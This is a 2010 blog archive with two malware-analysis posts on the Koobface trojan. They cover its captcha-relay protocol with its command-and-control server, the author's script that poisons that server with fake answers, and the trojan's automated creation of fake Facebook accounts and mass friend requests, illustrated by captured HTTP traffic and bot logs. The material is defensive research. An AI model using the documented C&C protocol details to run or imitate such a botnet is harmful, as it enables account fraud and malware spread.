Monthly Archive for January, 2010

Breaking Koobface’s Captcha Solving Process

It was a cold sunday so I decided to play a little bit with Koobface’s captcha breaking infrastructure.

I asked myself: Is it be possible to poisoning Koobface’s captcha breaking infrastructure by spoofing captcha results? As I documented in my post Koobface – the social network trojan, the captcha breaking process used by trojan Koobface works as follow:

  1. A bot would like to create a spoofed account (on Blogspot, Facebook, Myspace or whatever)
  2. The register page is protected with a captcha – so the bot grabs and send it to the C&C Server (uuu20091124.info)
  3. Another infected computer asks the C&C server for work to do at the same time
  4. The C&C server sends the captcha to the infected client where the user of the computer solves the captcha
  5. The infected computer sends the result of the captcha back to the C&C
  6. The bot that originally sent the captcha now asks the C&C server if there is already a resolution for the captcha
  7. If so, the C&C server returns the result of the captcha back to the bot
  8. The bot can successfully register the spoofed account.

It’s pretty simple, so I decided to write a small script which simulates Koobface’s captcha breaking module (v2captcha.exe) .

After writing some lines of code, I ran my script. The script just asks the C&C server for new captchas to break, generates spoofed captcha results and sends them back to the C&C server:

[17] 89.xxx.xxx.xx:3128 -> badboys -> 21303067 -> Success (145)
[16] 190.xxx.xxx.xxx:80 -> badboys -> 21303101 -> Success (146)
[10] 200.xxx.xxx.xxx:3128 -> badboys -> 21302809 -> Success (147)
[12] 191.xxx.xxx.xxx:8090 -> badboys -> 21303105 -> Success (148)
[18] 58.xxx.xxx.xxx:80 -> badboys -> 21302778 -> Success (149)
[22] 71.xxx.xxx.xxx:3128 -> badboys -> 21302802 -> Success (150)
[5] 64.xxx.xxx.xxx:8080 -> badboys -> 21302801 -> Success (151)
[19] 212.xxx.xxx.xxx:81 -> badboys -> 21303079 -> Success (152)
[1] 84.xxx.xxx.xxx:80 -> badboys -> 2130312 -> Success (153)
[8] 93.xxx.xxx.xxx:8080 -> badboys -> 21303115 -> Success (154)
[4] 77.xxx.xxx.xxx:3128 -> badboys -> 21302775 -> Success (155)

Some words about the output of the script: the value [xx] is the thread ID of the procees, followed by proxy:port, followed by a string (“badboys”) that’s returned as faked solution for the captcha, the TaskID (previously received from the C&C server), the response of the C&C server and finally the number of spoofed captchas so far:

[ThreadID] proxy:port -> spoofed captcha result -> TaskID -> status (counter)

To make sure that the spoofed captchas are really accepted by the Koobface Command&Control server (C&C), I just infected a computer with Koobface’s Blogspot (v2newblogger.exe) module which is beeing used to create faked blogspot accounts. Afterwards I started my script again.

First of all the infected computer tries to register a new blogspot account. As excepted, the trojan grabs the captcha and sends it to the C&C server uuu20091124.info by using HTTP POST and calling the action save (a=save).

POST /captcha/?a=save&b=goo HTTP/1.0
Host: uuu20091124.info
Content-Type: binary/octet-stream
Connection: close
Content-Length: 2762

The C&C server responds with a HTTP 200 OK and returns a TaskID:

HTTP/1.1 200 OK
Date: Sun, 17 Jan 2010 16:12:19 GMT
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Connection: close
Content-Type: text/html

21300807

As you can see, the C&C server told the bot to use the TaskID 21300807 for further requests concerning this job.

In parallel, our script diligently asks for new tasks and “solves” them by sending a faked string back to the server. After a few seconds that looks like this:

[9] 189.xxx.xxx.xxx:3128 -> badboys-> 21300821 -> Success (1330)
[22] 78.xxx.xxx.xxx:3128 -> badboys -> 21300812 -> Success (1331)
[4] 200.xxx.xxx.xxx:81 -> badboys -> 21300807 -> Success (1332)
[3] 41.xxx.xxx.xxx:8080 -> badboys -> 21300776 -> Success (1333)
[14] 94.xxx.xxx.xxx:3128 -> Unsuccessful
[4] 174.xxx.xxx.xxx:80 -> badboys -> 21300802 -> Success (1334)

Did you see it? Our script received the captcha with the TaskID 21300807 and has sent back the word “badboys” as resolution. That’s the captcha from our bot! Now let’s go back to the bot and check what answer it gets from the C&C server for the captcha submitted a few seconds before:

GET /captcha/?a=query&b=goo&id=21300807 HTTP/1.0
Host: uuu20091124.info
Connection: close

The bot asks the server if the captcha is already solved by calling the action “query” (a=query) and using the TaskID 21300807. The C&C server respond:

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Connection: close
Content-Type: text/html

3|badboy

Strike! The bot recived badboy as resolution of the captcha – the captcha spoofing works!
Let’s run our script for some more minutes:

2297 seconds elapsed, spoofed 4438 captchas (119 unsuccessful).

Okey, that’s really nice. Within around 45 minutes more than 4’400 captchas could be spoofed!

You may ask yourself why the spoofing is so simple. There are several reasons:

  • Koobface is not doing any authentification of the bot
  • The C&C traffic is not encrypted/obfuscated in any way (plain text)
  • The C&C servers does only send the captcha to one bot for solving instead of sending the same captcha to different bots and comparing the results
  • There is no limit for sending results to the C&C server
  • The server doesn’t even check if a returned task id was indeed assigned – you can just post any TaskID and the C&C server will accept it

Conclusion
Koobface’s captcha breaking infrastrucutre is weak. Any IP address is allowed to send and receive tasks from Koobface’s C&C servers. There is no authentification of the bot. So with a few simple lines of code you are able to disturbe Koobface’s captcha breaking infrastructure massively so that captcha breaking process is no longer useful.

A positiv effect of the captcha result spoofing is that it prevents the bot from successfully creating faked accounts on blogspot, Facebook, Myspace etc. As a result of this and due to the fact that Koobface needs such faked accounts on social network to spread itself, the koobface infection vectore is broken.

As mentioned in my earlier post, it seems that the Koobface gang is offering a Captcha Decoder Servis. By disturbing the captcha breaking process the Koobface gang will lose money with every captcha which could not be successfully solved.

Happy captcha spoofing! :P

Dangerous friend requests on Facebook

While analyzing the Koobface trojan, I just made a interesting find. As mentioned in my post “Koobface – the social network trojan” from last year, Koobface uses social networks to spread itself. So let me ask you: What does a trojan need to spread itself on social networking sites? The answer is simple: A valid account. The cybercriminal has two possiblities to obtain valid accounts:

  • Using some phishing tricks to steal credentials
  • Creating fake accounts

There are two reasons why most cybercriminals are trying to phish the credentials from users of social networking sites instead of creating fake accounts by their own:

  • Most of the time the register forms of the social networking sites are protected with a captcha
  • At the moment, there is no reliable method to break captchas

As described in my post about Koobface last year, the Koobface trojan is able to “break” captchas (to be correct, the trojan isn’t able to break captchas rather then it servs the captchas to the infected bots where the captchas will be solved by the users). By using this technique, he is able to create hundreds of faked accounts on social networks (per minute!).

Creating malicious Facebook accounts
To spread itself, the trojan creates spoofed Facebook accounts on which he will post malicious comments and sends messages with a link to a malicious sites. For those of you who are not familiar with Facebook: Before you can write a message or create a message at the pinboard of somebody, you have to be a friend of this person. So before the Koobface trojan can start to post malicious messages he has to get some friends. Don’t be afraid, but even that is no problem for Koobface: It is able to send friend requests to hundreds of Facebook members.

When you log into Facebook, you’re browser will save a cookie on your computer. In fact Koobface uses the Internet Exporer installed on a infected computer to log into Facebook. So what would happen when you are infected with Koobface and you would try to access *your* personal Facebook account?

Uuuh?!?! What’s that?

That’s not my account ?!?! But who is Anyeta Fecher?
The answer is simple: That’s an account which was created by Koobface. But how does that work? I will show you:

First of all the trojan sends a request to a zombie, calling the module grgen:

POST /.sys/?action=grgen&v=05 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )
Content-type: application/x-www-form-urlencoded
Connection: close
Content-Length: 0

The zombie/proxy will return some information about the account which the infected bot should create:

HTTP/1.1 200 OK
Content-Type: text/html
Connection: close

#BLACKLABEL
SOFT|ADD
LOGIN|kulchvr.hhwgzlbsy/oon@hodma/erq
PASS|ci6h}r95df0
ID|21375
BIRTHDAY-YEAR|1982
BIRTHDAY-MONTH|7
BIRTHDAY-DAY|16
LOGS|1
[...]

Lets’ take a deeper look at this response: The response will instruct the bot to create a new account (SOFT|ADD) using a email adresse (LOGIN) and password (PASS). The email address which is used by the LOGIN parameter as well as the password is scrambled (so you won’t be able to log in with these credentials). The zombie will return some more parameters like birthday, Facebook groups which the malicious account should join etc. The bot will now start with the registrartion of the account. During the registration process, he will get a captcha from Facebook which he will send to the C&C server. As soon as the captcha is resolved, the C&C server will return it to the bot which can now finish the registration process.

On the next step, the trojan will send a log back to the C&C server with some information about the registration of the Facebook account:

POST /log.php?id=21963&soft=ADD&build=0017 HTTP/1.1
accept-encoding: text/html, text/plain
COnnecTIon: cLOse
Host: 61.235.117.83
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )
Content-type: application/x-www-form-urlencoded
Content-Length: 3759

20100109 16:38:53 ThreadID:1504 ProcID: 1516 reg build 0018
20100109 16:38:53 ThreadID:1504 ProcID: 1516 FB reg start
20100109 16:38:53 ThreadID:1504 ProcID: 1516 IE VERSION=7.0.5730.10
20100109 16:38:53 ThreadID:1504 ProcID: 1516 C:\Documents and settings\USER\Cookies
20100109 16:38:53 ThreadID:1504 ProcID: 1516 get work domain
20100109 16:38:53 ThreadID:1504 ProcID: 1516 create browser thread
20100109 16:38:53 ThreadID:1504 ProcID: 1516 Create google browser
20100109 16:38:53 ThreadID:1504 ProcID: 1516 Create main browser
20100109 16:38:53 ThreadID:1504 ProcID: 1516 getactivedomain
20100109 16:38:53 ThreadID:1504 ProcID: 1516 check inet
20100109 16:38:53 ThreadID:1504 ProcID: 1516 inet ok
20100109 16:38:53 ThreadID:1504 ProcID: 1516 trying
20100109 16:38:53 ThreadID:1504 ProcID: 1516 xxxxxxx.xx
20100109 16:38:54 ThreadID:1504 ProcID: 1516 valid domain
20100109 16:38:54 ThreadID:1504 ProcID: 1516 xxxxxxx.xx
20100109 16:38:54 ThreadID:1504 ProcID: 1516 work domain
20100109 16:38:54 ThreadID:1504 ProcID: 1516 xxxxxxx.xx
20100109 16:38:54 ThreadID:1504 ProcID: 1516 wait inet begin
20100109 16:38:54 ThreadID:1504 ProcID: 1516 Request params
20100109 16:38:54 ThreadID:1504 ProcID: 1516 #BLACKLABEL
20100109 16:38:54 ThreadID:1504 ProcID: 1516 SOFT|ADD
20100109 16:38:54 ThreadID:1504 ProcID: 1516 LOGIN|kulchvr.hhwgzlbsy/oon@hodma/erq
20100109 16:38:54 ThreadID:1504 ProcID: 1516 PASS|ci6h}r95df0
20100109 16:38:54 ThreadID:1504 ProcID: 1516 ID|21375
20100109 16:38:54 ThreadID:1504 ProcID: 1516 BIRTHDAY-YEAR|1982
20100109 16:38:54 ThreadID:1504 ProcID: 1516 BIRTHDAY-MONTH|7
20100109 16:38:54 ThreadID:1504 ProcID: 1516 BIRTHDAY-DAY|16
20100109 16:38:54 ThreadID:1504 ProcID: 1516 LOGS|1
20100109 16:38:54 ThreadID:1504 ProcID: 1516 switch to confirm mode
20100109 16:38:54 ThreadID:1504 ProcID: 1516 confirmer module start
20100109 16:38:54 ThreadID:1504 ProcID: 1516 checking login
20100109 16:38:54 ThreadID:1504 ProcID: 1516 C:\Documents and settings\USER\Cookies
20100109 16:39:08 ThreadID:1504 ProcID: 1516 fb logoff begin
20100109 16:39:13 ThreadID:1504 ProcID: 1516 logout link not found
20100109 16:39:13 ThreadID:1504 ProcID: 1516 trying to login
20100109 16:39:17 ThreadID:1504 ProcID: 1516 fill login
20100109 16:39:17 ThreadID:1504 ProcID: 1516 check persist
20100109 16:39:20 ThreadID:1504 ProcID: 1516 fill pass
20100109 16:39:22 ThreadID:1504 ProcID: 1516 try submit
20100109 16:39:22 ThreadID:1504 ProcID: 1516 click submit button
20100109 16:39:30 ThreadID:1504 ProcID: 1516 seem to be logged in
20100109 16:39:35 ThreadID:1504 ProcID: 1516 confirm acc start
20100109 16:39:40 ThreadID:1504 ProcID: 1516 ERROR: skip step link not found
20100109 16:39:40 ThreadID:1504 ProcID: 1516 login ok
20100109 16:39:45 ThreadID:1504 ProcID: 1516 groups confirm begin
20100109 16:39:53 ThreadID:1504 ProcID: 1516 groups confirm end
20100109 16:39:53 ThreadID:1504 ProcID: 1516 friend request confirm begin
20100109 16:39:58 ThreadID:1504 ProcID: 1516 friend request confirm end
20100109 16:39:58 ThreadID:1504 ProcID: 1516 scan friend begin
20100109 16:40:04 ThreadID:1504 ProcID: 1516 no friends found
20100109 16:40:04 ThreadID:1504 ProcID: 1516 scan friend end
20100109 16:40:04 ThreadID:1504 ProcID: 1516 Stats: added 0
20100109 16:40:04 ThreadID:1504 ProcID: 1516 PLACES DUMP
20100109 16:40:04 ThreadID:1504 ProcID: 1516
20100109 16:40:04 ThreadID:1504 ProcID: 1516 finished

As you can see, the log is quite detailed (yeah, “click submit button” and “scan friend end” sounds funny…).
Now the trojan will start to “get some” friends. I suppose that the trojan will parse the member list of the group which he has received from the C&C server when he has requested the grgen module:

Let’s wait some minutes….. and then we will take another look at the malicious profile:

As you can see, the Koobface bot just sent out more than 1’000 friend requests on Facebook within a few minutes! But what suprised me much more is the fact, that all those people accepted the friend request. So I just ask myself why so much people accept friend requests from other people which they don’t even know?

Conclusion
Within a few minutes, more than 1’000 new friends were harvested by Koobface – all of them are potential victims now; as soon as the bot starts to send out posts/messages, it becomes a real threat to its friends.

So what we have learned:

  • Please be careful with friend request from persons which you don’t know (this also applies to all other social networks like myspace, netlog, hi5 etc)
  • If you find a malicious profile, report it to the administrator of the social network (eg. by using the report button)
  • And last but not least: If you go to Facebook and you are logged in with a unknown profile, you are infected with Koobface….

Happy (and safe) social networking!




economics-recluse
Scene
Urgent!